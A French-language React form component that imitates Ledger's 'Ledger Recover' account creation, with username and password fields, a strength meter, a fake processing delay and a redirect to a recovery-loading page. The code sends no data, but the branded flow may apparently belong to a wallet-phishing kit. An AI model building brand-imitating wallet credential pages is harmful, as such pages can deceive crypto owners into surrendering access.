// src/components/Identifiant.jsx
import React, { useState } from 'react';
import { motion, AnimatePresence } from 'framer-motion';
import gifImage from '../assets/dashboard2.png';
import './Identifiant.css';

const IdentifiantForm = () => {
  const [username, setUsername] = useState('');
  const [password, setPassword] = useState('');
  const [confirmPassword, setConfirmPassword] = useState('');
  const [errorMessage, setErrorMessage] = useState('');
  const [hasError, setHasError] = useState(false);
  const [showPassword, setShowPassword] = useState(false);
  const [isLoading, setIsLoading] = useState(false);

  const handleSubmit = async (e) => {
    e.preventDefault();
    setIsLoading(true);
    setErrorMessage('');
    setHasError(false);

    // Simule un délai de traitement
    await new Promise(resolve => setTimeout(resolve, 600));

    if (password === confirmPassword && password.length >= 6) {
      setIsLoading(false);
      window.location.href = "/loading-recovery";
    } else if (password !== confirmPassword) {
      setIsLoading(false);
      setErrorMessage('Les mots de passe ne correspondent pas. Veuillez réessayer.');
      setHasError(true);
    } else {
      setIsLoading(false);
      setErrorMessage('Le mot de passe doit contenir au moins 6 caractères.');
      setHasError(true);
    }
  };

  const handleTogglePassword = () => {
    setShowPassword(!showPassword);
  };

  const getPasswordStrength = (pass) => {
    if (pass.length === 0) return 0;
    if (pass.length < 6) return 1;
    if (pass.length < 10) return 2;
    return 3;
  };

  const strength = getPasswordStrength(password);
  const strengthColors = ['transparent', '#ff4444', '#ffaa00', '#00cc66'];
  const strengthLabels = ['', 'Faible', 'Moyen', 'Fort'];

  return (
    <div className="identifiant-main-block">
      <div className="identifiant-container">
        {/* GIF à gauche */}
        <motion.div 
          className="gif-container"
          initial={{ opacity: 0, x: -40 }}
          animate={{ opacity: 1, x: 0 }}
          transition={{ duration: 0.8, delay: 0.3 }}
        >
          <img src={gifImage} alt="Animation" className="gif-image2" />
        </motion.div>

        {/* Formulaire */}
        <motion.div 
          className="identifiant-form-container"
          initial={{ opacity: 0, x: 40 }}
          animate={{ opacity: 1, x: 0 }}
          transition={{ duration: 0.8, delay: 0.4 }}
        >
          <h3>Créez votre identifiant Ledger Recover</h3>

          <form onSubmit={handleSubmit}>
            {/* Identifiant */}
            <div className="form-group">
              <label className="input-label">Identifiant</label>
              <input
                type="text"
                placeholder="Choisissez un identifiant"
                value={username}
                onChange={(e) => setUsername(e.target.value)}
                className="inputt-field"
                required
                autoComplete="username"
              />
            </div>

            {/* Mot de passe */}
            <div className="form-group">
              <label className="input-label">Mot de passe</label>
              <input
                type={showPassword ? 'text' : 'password'}
                placeholder="Créez un mot de passe sécurisé"
                value={password}
                onChange={(e) => {
                  setPassword(e.target.value);
                  if (hasError) {
                    setHasError(false);
                    setErrorMessage('');
                  }
                }}
                className={`inputt-field ${hasError ? 'input-error' : ''}`}
                required
                autoComplete="new-password"
                minLength={6}
              />
              {/* Barre de force du mot de passe */}
              {password.length > 0 && (
                <motion.div
                  initial={{ opacity: 0, height: 0 }}
                  animate={{ opacity: 1, height: 'auto' }}
                  style={{ marginTop: '0.5rem' }}
                >
                  <div style={{
                    height: '4px',
                    borderRadius: '2px',
                    background: '#222',
                    overflow: 'hidden'
                  }}>
                    <motion.div
                      initial={{ width: 0 }}
                      animate={{ width: `${(strength / 3) * 100}%` }}
                      transition={{ duration: 0.3 }}
                      style={{
                        height: '100%',
                        background: strengthColors[strength],
                        borderRadius: '2px'
                      }}
                    />
                  </div>
                  <span style={{
                    fontSize: '0.75rem',
                    color: strengthColors[strength],
                    marginTop: '0.25rem',
                    display: 'block'
                  }}>
                    {strengthLabels[strength]}
                  </span>
                </motion.div>
              )}
            </div>

            {/* Confirmation */}
            <div className="form-group">
              <label className="input-label">Confirmer le mot de passe</label>
              <input
                type={showPassword ? 'text' : 'password'}
                placeholder="Confirmez votre mot de passe"
                value={confirmPassword}
                onChange={(e) => {
                  setConfirmPassword(e.target.value);
                  if (hasError) {
                    setHasError(false);
                    setErrorMessage('');
                  }
                }}
                className={`inputt-field ${hasError ? 'input-error' : ''}`}
                required
                autoComplete="new-password"
              />
              <button
                type="button"
                className="toggle-password"
                onClick={handleTogglePassword}
              >
                {showPassword ? 'Masquer le mot de passe' : 'Afficher le mot de passe'}
              </button>
            </div>

            {/* Bouton Continuer */}
            <div className="form-button-group">
              <motion.button 
                type="submit" 
                className="custom-button"
                whileHover={{ scale: 1.02 }}
                whileTap={{ scale: 0.98 }}
                disabled={isLoading}
              >
                {isLoading ? (
                  <span style={{ display: 'flex', alignItems: 'center', justifyContent: 'center', gap: '0.5rem' }}>
                    <span style={{
                      width: '16px',
                      height: '16px',
                      border: '2px solid rgba(0,0,0,0.2)',
                      borderTop: '2px solid #000',
                      borderRadius: '50%',
                      animation: 'spin 0.8s linear infinite'
                    }} />
                    Création en cours...
                  </span>
                ) : (
                  'Continuer'
                )}
              </motion.button>
            </div>

            {/* Message d'erreur */}
            <AnimatePresence>
              {errorMessage && (
                <motion.p 
                  className="error-message"
                  initial={{ opacity: 0, y: -10 }}
                  animate={{ opacity: 1, y: 0 }}
                  exit={{ opacity: 0, y: -10 }}
                  transition={{ duration: 0.3 }}
                >
                  {errorMessage}
                </motion.p>
              )}
            </AnimatePresence>
          </form>
        </motion.div>
      </div>
    </div>
  );
};

export default IdentifiantForm;